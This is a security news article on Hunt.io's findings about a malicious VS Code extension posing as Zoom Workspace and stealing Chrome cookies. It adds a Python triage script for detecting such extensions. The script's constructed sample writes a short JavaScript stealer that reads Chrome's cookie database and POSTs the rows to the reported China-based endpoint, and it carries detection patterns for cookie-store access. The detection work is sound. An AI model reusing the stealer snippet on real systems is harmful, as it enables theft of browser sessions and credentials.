Source: Hunt.io
A recent investigation by Hunt.io has uncovered a campaign targeting software developers through malicious Visual Studio Code (VS Code) extensions. The primary culprit is an extension impersonating the popular Zoom Workspace tool, designed to steal Google Chrome cookies and other sensitive data.
The extension, uploaded to the VS Code Marketplace on November 30, initially appeared legitimate, even linking to the official GitHub repository for Zoom's Meeting SDK. Closer inspection told a different story: the Chrome cookie-stealing code appeared only in version 0.2.2, suggesting the attackers published an innocuous build first and added the payload in a later update to evade early detection.
To gain users’ trust, the threat actors posted a single positive review on the extension’s release date, possibly from an inauthentic account.
Hunt.io's analysis of the extension's files points to three indicators:
- Targeting Chrome cookies: the extension opens Chrome's cookie store at AppData\Local\Google\Chrome\User Data\Default\Cookies, a SQLite database, and queries it for host keys, cookie values, and expiration dates. Note that Chrome keeps the cookie values in this database encrypted under a key stored alongside the profile, so the rows alone are not enough to replay a session; the key material has to be taken as well.
- Suspicious endpoint: the script sends data to https://api.storagehb[.]cn, a server located in China. The endpoint returned HTTP 404 during analysis, but the researchers assess it to be a command-and-control (C2) node or a drop point for stolen data.
- Hardcoded secrets: the extension's bundled .env file contains API keys for more than 20 services, including GitHub, AWS, and PayPal.
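The three indicators above are all visible in an extension's unpacked files, so they can be checked statically before the extension ever runs. The following triage script is an added example written for this page, not Hunt.io's tooling or the extension's code: it walks one extension directory, flags references to Chrome's cookie database and SQLite queries against it, compares every outbound host against the repository and homepage declared in package.json, and looks for secrets in a bundled .env. The Chrome cookie-table column names (host_key, encrypted_value, expires_utc) are Chrome's real schema; the SQLite module names, the regex for env secrets, and the sample extension it builds in a temporary directory are constructed assumptions that mimic the reported behaviour. The only real indicator it carries is the endpoint named in the report.

```python
"""Static triage of an unpacked VS Code extension for the indicators in the
Hunt.io write-up: Chrome cookie-store access, SQLite queries against it,
undeclared outbound hosts, and secrets in a bundled .env."""
import json
import re
import tempfile
from pathlib import Path

# Chrome's cookie database, either slash style, with or without the newer Network\ subdir.
CHROME_COOKIE_PATH = re.compile(
    r"Google[\\/]+Chrome[\\/]+User Data[\\/]+Default[\\/]+(?:Network[\\/]+)?Cookies", re.I)
# host_key / encrypted_value / expires_utc are Chrome's real cookie-table columns;
# the module names are assumptions about how an extension might open the file.
SQLITE_COOKIE_QUERY = re.compile(
    r"\b(?:sqlite3|better-sqlite3|sql\.js)\b"
    r"|\bSELECT\b[^;]*\b(?:host_key|encrypted_value|expires_utc)\b", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9\-\[\].]+)", re.I)
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "env_assignment": re.compile(r"^[A-Z0-9_]*(?:KEY|SECRET|TOKEN|PASSWORD)[A-Z0-9_]*=\S+", re.M),
}
KNOWN_BAD_HOSTS = {"api.storagehb.cn"}  # endpoint named in the Hunt.io report
SCAN_SUFFIXES = {".js", ".cjs", ".ts", ".json"}


def normalize_host(host: str) -> str:
    """Accept defanged hosts such as api.example[.]cn and strip trailing dots."""
    return host.replace("[.]", ".").lower().rstrip(".")


def declared_hosts(package_json: dict) -> frozenset:
    """Hosts the publisher points at in repository/homepage; anything else is undeclared."""
    repo = package_json.get("repository")
    if isinstance(repo, dict):
        repo = repo.get("url")
    urls = [u for u in (repo, package_json.get("homepage")) if isinstance(u, str)]
    return frozenset(normalize_host(h) for u in urls for h in URL_HOST.findall(u))


def scan_text(text: str, declared: frozenset = frozenset()) -> dict:
    """Per-file findings; every value is falsy when the text is clean."""
    hosts = {normalize_host(h) for h in URL_HOST.findall(text)}
    return {
        "chrome_cookie_db": bool(CHROME_COOKIE_PATH.search(text)),
        "sqlite_cookie_query": bool(SQLITE_COOKIE_QUERY.search(text)),
        "known_bad_hosts": sorted(h for h in hosts if h in KNOWN_BAD_HOSTS),
        "undeclared_hosts": sorted(h for h in hosts if h not in KNOWN_BAD_HOSTS and h not in declared),
        "secrets": sorted(name for name, pat in SECRET_PATTERNS.items() if pat.search(text)),
    }


def scan_extension(root) -> dict:
    """Walk one unpacked extension directory and merge the per-file findings."""
    root = Path(root)
    pkg = root / "package.json"
    declared = declared_hosts(json.loads(pkg.read_text(encoding="utf-8"))) if pkg.is_file() else frozenset()
    report = {"chrome_cookie_db": False, "sqlite_cookie_query": False,
              "known_bad_hosts": set(), "undeclared_hosts": set(), "secrets": set(), "files": []}
    for path in root.rglob("*"):
        # Path(".env").suffix is "", so the dotfile needs an explicit name check.
        if not path.is_file() or not (path.name == ".env" or path.suffix in SCAN_SUFFIXES):
            continue
        found = scan_text(path.read_text(encoding="utf-8", errors="replace"), declared)
        report["chrome_cookie_db"] |= found["chrome_cookie_db"]
        report["sqlite_cookie_query"] |= found["sqlite_cookie_query"]
        for key in ("known_bad_hosts", "undeclared_hosts", "secrets"):
            report[key].update(found[key])
        if any(found.values()):
            report["files"].append(path.relative_to(root).as_posix())
    for key in ("known_bad_hosts", "undeclared_hosts", "secrets", "files"):
        report[key] = sorted(report[key])
    if report["chrome_cookie_db"] or report["known_bad_hosts"] or report["secrets"]:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "review" if report["undeclared_hosts"] else "clean"
    return report


def build_sample_extension(directory) -> Path:
    """Constructed files mimicking the reported behaviour (not the real extension).
    The GitHub URL is a placeholder; the AWS key is Amazon's documented example value."""
    root = Path(directory)
    (root / "package.json").write_text(json.dumps({
        "name": "sample-workspace-extension", "version": "0.2.2",
        "repository": {"type": "git", "url": "https://github.com/example-publisher/example-repo"},
    }), encoding="utf-8")
    (root / "extension.js").write_text(
        "const Database = require('better-sqlite3');\n"
        "const db = new Database(process.env.LOCALAPPDATA + "
        "'\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies');\n"
        "const rows = db.prepare('SELECT host_key, encrypted_value, expires_utc FROM cookies').all();\n"
        "fetch('https://api.storagehb.cn', {method: 'POST', body: JSON.stringify(rows)});\n",
        encoding="utf-8")
    (root / ".env").write_text(
        "GITHUB_TOKEN=ghp_" + "a" * 36 + "\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n",
        encoding="utf-8")
    return root


def demo_report() -> dict:
    """Build the constructed sample in a temp dir, scan it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_extension(build_sample_extension(tmp))


if __name__ == "__main__":
    print(json.dumps(demo_report(), indent=2))
```

To triage real installs, call scan_extension on each directory under ~/.vscode/extensions (one per publisher.name-version). A "review" verdict only means the extension talks to hosts its own package.json never mentions, which legitimate extensions also do; "suspicious" is reserved for the cookie-store path, a known-bad host, or credential material shipped inside the package. Diffing the reports of two versions of the same extension is the cheapest way to catch the phased rollout described above, where the payload appears only in a later update.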
The phased introduction of the malicious code, combined with obfuscation and asynchronous data fetching, points to a deliberate and reasonably sophisticated operation rather than an opportunistic one.
This incident serves as a wake-up call for developers relying on extensions to enhance their IDEs. "Compromising an IDE can serve as a gateway for further attacks within an organization's development lifecycle," the report warns. Developers are encouraged to scrutinize extensions with low install counts and limited reviews, as these are often red flags, and to remember that an extension linking to a legitimate vendor's repository is not thereby published by that vendor, as this case shows.